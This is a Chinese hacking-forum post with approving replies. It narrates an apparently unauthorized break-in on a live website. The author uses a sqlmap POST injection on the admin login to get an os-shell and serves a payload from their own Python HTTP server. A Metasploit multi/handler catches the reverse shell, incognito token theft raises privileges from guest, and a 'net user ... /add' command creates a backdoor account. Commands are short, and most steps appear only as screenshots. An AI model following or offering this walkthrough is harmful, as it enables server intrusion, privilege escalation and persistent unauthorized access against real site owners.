切换到宽版

中国黑防联盟

查看: 291|回复: 8

非法网站从sqlmap到msf提权远程连接成功

[复制链接]
发表于 2020-10-20 08:43:10 | |阅读模式
一 前言
5ee641dbd798db49073bd0e81f10cd4d_19856.jpg
这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器
1.1收集信息
因为主要想练习sql注入,所以信息收集做的比较简单:
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms
530508344a134d81574d1d6392178f73_89923.png
发现后台登录页面有post sql注入
1.2利用sqlmap一把梭并获取os-shell
d3aa4c5832bcf7711efde23194ddabb3_23312.png
二.利用python搭建一个简单的http服务器
python -m SimpleHTTPServer
2a51ec497128bdd47d31035551333a83_80378.jpg
1.1在这里要给他的服务器写入一个目录
md C:        est
1.用自己的服务器上文件上传到被攻击服务器
ae7243c3dc5688d6b2e2e82abb9ec7c5_76451.jpg
56539d21a23b14ae4012069209126572_39501.jpg
f259441e892865852f7d9f04c962683b_28000.jpg
三 然后我们在msf上操作1.1 :输入 use exploit/mulit/hander1.2 : 输入 set lhost 接收反弹shell的ip1.2 :输入 run 一把嗦
6d4d8a4bb141fd7b2d6cd9d4493a374b_99199.jpg
3523fb9d46b69fbf698c7cdd0b869cae616aea94.png
四.成功进入该服务器
3634655671e254363c94c7be40d06d76cbaaa45b.png
这时发现我们只有gust权限 难受
79b6399d1d7841113506f36448f81084_62373.png
五.开启艰难的提权之路1.1利用方法内核提权窃取管理tokens 提权
弟弟目前只知道着两种
25b1a604eb93e244278d728c16630bb3_99600.jpg
本文只利用tokens 提权方式 有机会写一篇 内核提权的文章

使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
0258f1d9fa0cf2e51ca8dfa6ba3476a3_93260.png
553fc2c300a299e057b730438d413a20_44932.jpg
———————————————————————————————————————————————————————————————————
提权成功
六.创建用户
命令:net user 用户名 密码 /add
思索许久……发现忘了把自己加入管理员用户组了 !!!!!

搞定
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-4-18 09:31:32 |
跟我熟的人,请自动忽略此条回复。
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-5-15 03:26:19 |
啥也不说了,楼主就是给力!
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-6-28 19:49:36 |
支持一下,希望楼主做的更好,加油
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-8-4 20:01:21 |
永远支持中国黑防联盟:www.vcs6.com
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-8-5 16:44:42 |
不错,又占了一个沙发!
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-9-14 22:44:31 |
谢谢楼主分享,正需要
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-9-23 19:32:16 |
这个必须支持一波,楼主威武
永远支持中国黑防联盟论坛:www.vcs6.com
发表于 2021-9-30 14:46:42 |
似乎是个好东西。
永远支持中国黑防联盟论坛:www.vcs6.com
关闭

站长推荐上一条 /1 下一条

手机版|小黑屋|网站地图|( 蜀ICP备2020029785号 )

快速回复 返回顶部 返回列表